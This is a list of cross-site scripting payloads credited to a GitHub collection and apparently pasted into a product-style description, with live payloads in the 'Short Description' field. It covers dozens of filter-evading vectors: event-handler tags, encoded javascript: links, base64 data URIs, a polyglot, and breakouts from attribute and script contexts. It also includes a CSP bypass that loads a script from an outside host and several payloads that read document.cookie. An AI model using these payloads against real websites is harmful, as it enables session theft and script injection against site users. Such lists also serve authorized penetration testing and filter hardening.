again

Short Description:

1</svg>''<svg><script 'test'>alert(1)<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onload="alert(document.cookie)"><a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a><a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>

Full Description

#############################################################
# XSS-Payloads https://github.com/RenwaX23/XSS-Payloads #
# https://twitter.com/RenwaX23 #
#############################################################

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

xss

i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\'\s\rc\=\'eeeeeee\'\20\>{

Click Here

xss

xss

<svg/onload=window.onerror=alert;throw/XSS/;//

<object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=' /src>

<InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>xss

<img src="x:alert" onerror="eval(src%2b'(1)')">

<img/src=xss%0A/**/onerror=eval('al'%2b'ert(1)')>

<img/alt=1 onerror=eval(src) src=x:alert(alt) >

<isindex/**/alt=1+src=xss:window['alert']/**/(alt)+type=image+onerror=while(true){eval(src)}>

<input type="text" name="foo" value=""autofocus/onfocus=alert(1)//">

<math href="javascript:alert(1)">CLICKME

<var onmouseover="prompt(1)">xss</var>

<h1/onmouseover='alert(1)'>xss

<object data="javascript:alert(1)">

<--'<script>window.confirm(1)</script> --!>

<div onmouseover=prompt("1")>xss

<img src=x onerror=window.open('data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=');>

<plaintext/onmousemove=prompt(1)>xss

<marquee/onstart=alert(1)>xss

<embed src=javascript:alert(1)>

<select autofocus onfocus=alert(1)>

<textarea autofocus onfocus=alert(1)>

<keygen autofocus onfocus=alert(1)>

<div/onmouseover='alert(1)'>xss

<svg/onload=document.location.href='https://google.com'>

<audio src=x onerror=confirm("1")>

<iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4="/>

<img%09onerror=alert(1) src=a>

<i onclick=alert(1)>Click here</i>

<img src=<b onerror=alert('xss');>

<img src="x:? title=" onerror=alert(1)//">

<img src="x:gif" onerror="eval('al'%2b'ert(/xss/)')">

<img src="x:gif" onerror="window['al\u0065rt'] (/'xss'/)"></img>

<a onmouseover%3D"alert(1)">xss

<script/%00%00v%00%00>alert(/xss/)</script>

<svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>

<script>$=1,alert($)</script>

<svg•onload=alert(1)>

<h1/onmouseover='alert(1)'>xss

<video onerror=alert(1337) </poster>

<input onfocus=alert(1337) </autofocus>

CSP BYPASS:

<script>f=document.createElement("iframe");f.id="pwn";f.src="/robots.txt";f.onload=()=>{x=document.createElement('script');x.src='//bo0om.ru/csp.js';pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);</script>

POLYGLOT:

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

HYPERLINK TAG INJECTION:

javascript:alert(1)

javascript://%250Aalert(document.location="https://google.com",document.location="https://www.facebook.com")

javascript://%250Aalert(document.cookie)

javascripT://https://google.com%0aalert(1);//https://google.com

/x:1/:///%01javascript:alert(document.cookie)/

INLINE HTML INJECTION WITHOUT TAG BREAK:

" onclick=alert(1)//">click

" autofocus onfocus=alert(1) "

" onfocus=prompt(1) autofocus fragment="

" onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"

JAVASCRIPT INJECTION:

'?prompt`1`?'

"])},alert(1));(function xss() {//

""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y

"}]}';alert(1);{{'

11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1

\');confirm(1);//

x");$=alert, $(1);//

'|alert(1)|'

'*prompt(1)*'

"; ||confirm('XSS') || "

"-alert(1)-"

\'-alert(1)};{//

"'-alert(1)-'"

\u0027-confirm`1`-\u0027

'}};alert(1);{{'

// XSS //